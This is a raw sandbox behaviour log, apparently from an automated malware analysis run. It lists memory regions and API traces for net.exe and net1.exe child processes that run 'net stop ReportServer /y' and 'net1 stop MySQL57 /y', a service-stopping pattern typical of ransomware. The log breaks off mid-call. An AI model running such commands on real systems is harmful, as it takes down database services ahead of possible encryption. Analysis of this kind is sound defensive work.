00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8900 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8901 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8902 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8903 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8904 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8905 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8906 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8907 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8908 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8909 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8910 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 8911 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8912 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 8913 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8914 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 695 os_tid = 0xeb4 Process: id = "231" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x54143000" os_pid = "0xc88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ReportServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8916 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8917 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8918 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8919 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8920 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8921 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8922 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8923 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8924 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8925 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8926 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 8927 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8928 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8929 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8930 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9132 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9133 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9134 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9135 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 9136 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 9137 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9138 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9139 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9140 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 9141 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 9142 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 9143 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9144 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9145 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9146 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9147 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9148 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9149 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9150 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9151 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 697 os_tid = 0xd54 Process: id = "232" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5ddc6000" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "222" os_parent_pid = "0xb70" cmd_line = "C:\\Windows\\system32\\net1 stop MySQL57 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8931 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8932 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8933 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8934 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 8935 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8936 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8937 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8938 start_va = 0xff890000 end_va = 0xff8c2fff entry_point = 0xff890000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8939 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8940 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8941 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 8942 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8943 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8944 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8945 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8976 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8977 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8978 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8979 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 8980 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 8981 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8982 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8983 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8984 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8985 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8986 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8987 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8988 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8989 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8990 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8991 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8992 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8993 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8994 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8995 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8996 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8997 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8998 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9045 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 699 os_tid = 0x1338 [0107.611] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd10 | out: lpSystemTimeAsFileTime=0x18fd10*(dwLowDateTime=0xf54b8df0, dwHighDateTime=0x1d48689)) [0107.611] GetCurrentProcessId () returned 0xca4 [0107.611] GetCurrentThreadId () returned 0x1338 [0107.611] GetTickCount () returned 0x24a29 [0107.611] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd18 | out: lpPerformanceCount=0x18fd18*=1815452900000) returned 1 [0107.612] GetModuleHandleW (lpModuleName=0x0) returned 0xff890000 [0107.612] __set_app_type (_Type=0x1) [0107.612] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8a9c9c) returned 0x0 [0107.612] __getmainargs (in: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788, _DoWildCard=0, _StartInfo=0xff8b479c | out: _Argc=0xff8b4780, _Argv=0xff8b4790, _Env=0xff8b4788) returned 0 [0107.612] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.612] GetConsoleOutputCP () returned 0x1b5 [0107.626] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8bcec0 | out: lpCPInfo=0xff8bcec0) returned 1 [0107.626] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0107.629] sprintf_s (in: _DstBuf=0x18fcb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.629] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.633] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.633] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL57 /y" [0107.633] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fa50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0107.633] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.633] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fca8 | out: Buffer=0x18fca8*=0x314d40) returned 0x0 [0107.633] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fca8 | out: Buffer=0x18fca8*=0x31c0e0) returned 0x0 [0107.633] _fileno (_File=0x7fefdba2a80) returned 0 [0107.633] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0107.633] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.633] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.633] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.634] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.634] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.634] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.634] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.634] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.634] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.634] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.634] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.634] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.634] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.634] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.634] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.634] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.634] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.634] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.634] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.634] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.634] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.634] _wcsicmp (_String1="accounts", _String2="MySQL57") returned -12 [0107.634] _wcsicmp (_String1="computer", _String2="MySQL57") returned -10 [0107.634] _wcsicmp (_String1="config", _String2="MySQL57") returned -10 [0107.634] _wcsicmp (_String1="continue", _String2="MySQL57") returned -10 [0107.634] _wcsicmp (_String1="cont", _String2="MySQL57") returned -10 [0107.634] _wcsicmp (_String1="file", _String2="MySQL57") returned -7 [0107.634] _wcsicmp (_String1="files", _String2="MySQL57") returned -7 [0107.634] _wcsicmp (_String1="group", _String2="MySQL57") returned -6 [0107.634] _wcsicmp (_String1="groups", _String2="MySQL57") returned -6 [0107.634] _wcsicmp (_String1="help", _String2="MySQL57") returned -5 [0107.634] _wcsicmp (_String1="helpmsg", _String2="MySQL57") returned -5 [0107.634] _wcsicmp (_String1="localgroup", _String2="MySQL57") returned -1 [0107.635] _wcsicmp (_String1="pause", _String2="MySQL57") returned 3 [0107.635] _wcsicmp (_String1="session", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="sessions", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="sess", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="share", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="start", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="stats", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="statistics", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="stop", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="time", _String2="MySQL57") returned 7 [0107.635] _wcsicmp (_String1="user", _String2="MySQL57") returned 8 [0107.635] _wcsicmp (_String1="users", _String2="MySQL57") returned 8 [0107.635] _wcsicmp (_String1="msg", _String2="MySQL57") returned -6 [0107.635] _wcsicmp (_String1="messenger", _String2="MySQL57") returned -20 [0107.635] _wcsicmp (_String1="receiver", _String2="MySQL57") returned 5 [0107.635] _wcsicmp (_String1="rcv", _String2="MySQL57") returned 5 [0107.635] _wcsicmp (_String1="netpopup", _String2="MySQL57") returned 1 [0107.635] _wcsicmp (_String1="redirector", _String2="MySQL57") returned 5 [0107.635] _wcsicmp (_String1="redir", _String2="MySQL57") returned 5 [0107.635] _wcsicmp (_String1="rdr", _String2="MySQL57") returned 5 [0107.635] _wcsicmp (_String1="workstation", _String2="MySQL57") returned 10 [0107.635] _wcsicmp (_String1="work", _String2="MySQL57") returned 10 [0107.635] _wcsicmp (_String1="wksta", _String2="MySQL57") returned 10 [0107.635] _wcsicmp (_String1="prdr", _String2="MySQL57") returned 3 [0107.635] _wcsicmp (_String1="devrdr", _String2="MySQL57") returned -9 [0107.635] _wcsicmp (_String1="lanmanworkstation", _String2="MySQL57") returned -1 [0107.635] _wcsicmp (_String1="server", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="svr", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="srv", _String2="MySQL57") returned 6 [0107.635] _wcsicmp (_String1="lanmanserver", _String2="MySQL57") returned -1 [0107.635] _wcsicmp (_String1="alerter", _String2="MySQL57") returned -12 [0107.636] _wcsicmp (_String1="netlogon", _String2="MySQL57") returned 1 [0107.636] _wcsupr (in: _String="MySQL57" | out: _String="MYSQL57") returned="MYSQL57" [0107.636] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x31cdf0 [0107.656] GetServiceKeyNameW (in: hSCManager=0x31cdf0, lpDisplayName="MYSQL57", lpServiceName=0xff8b5750, lpcchBuffer=0x18fbc8 | out: lpServiceName="", lpcchBuffer=0x18fbc8) returned 0 [0107.658] _wcsicmp (_String1="msg", _String2="MYSQL57") returned -6 [0107.658] _wcsicmp (_String1="messenger", _String2="MYSQL57") returned -20 [0107.658] _wcsicmp (_String1="receiver", _String2="MYSQL57") returned 5 [0107.658] _wcsicmp (_String1="rcv", _String2="MYSQL57") returned 5 [0107.658] _wcsicmp (_String1="redirector", _String2="MYSQL57") returned 5 [0107.658] _wcsicmp (_String1="redir", _String2="MYSQL57") returned 5 [0107.658] _wcsicmp (_String1="rdr", _String2="MYSQL57") returned 5 [0107.658] _wcsicmp (_String1="workstation", _String2="MYSQL57") returned 10 [0107.658] _wcsicmp (_String1="work", _String2="MYSQL57") returned 10 [0107.658] _wcsicmp (_String1="wksta", _String2="MYSQL57") returned 10 [0107.658] _wcsicmp (_String1="prdr", _String2="MYSQL57") returned 3 [0107.658] _wcsicmp (_String1="devrdr", _String2="MYSQL57") returned -9 [0107.658] _wcsicmp (_String1="lanmanworkstation", _String2="MYSQL57") returned -1 [0107.658] _wcsicmp (_String1="server", _String2="MYSQL57") returned 6 [0107.658] _wcsicmp (_String1="svr", _String2="MYSQL57") returned 6 [0107.658] _wcsicmp (_String1="srv", _String2="MYSQL57") returned 6 [0107.658] _wcsicmp (_String1="lanmanserver", _String2="MYSQL57") returned -1 [0107.658] _wcsicmp (_String1="alerter", _String2="MYSQL57") returned -12 [0107.658] _wcsicmp (_String1="netlogon", _String2="MYSQL57") returned 1 [0107.658] NetServiceControl (in: servername=0x0, service="MYSQL57", opcode=0x0, arg=0x0, bufptr=0x18fbd0 | out: bufptr=0x18fbd0) returned 0x889 [0107.660] wcscpy_s (in: _Destination=0xff8b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.660] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0107.661] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8b5b50, nSize=0x800, Arguments=0xff8b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.662] GetFileType (hFile=0xb) returned 0x2 [0107.664] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fa98 | out: lpMode=0x18fa98) returned 1 [0107.664] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18fa90, lpReserved=0x0 | out: lpBuffer=0xff8b5b50*, lpNumberOfCharsWritten=0x18fa90*=0x1e) returned 1 [0107.664] GetFileType (hFile=0xb) returned 0x2 [0107.665] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18fa98 | out: lpMode=0x18fa98) returned 1 [0107.665] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff891efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18fa90, lpReserved=0x0 | out: lpBuffer=0xff891efc*, lpNumberOfCharsWritten=0x18fa90*=0x2) returned 1 [0107.665] _ultow (in: _Dest=0x889, 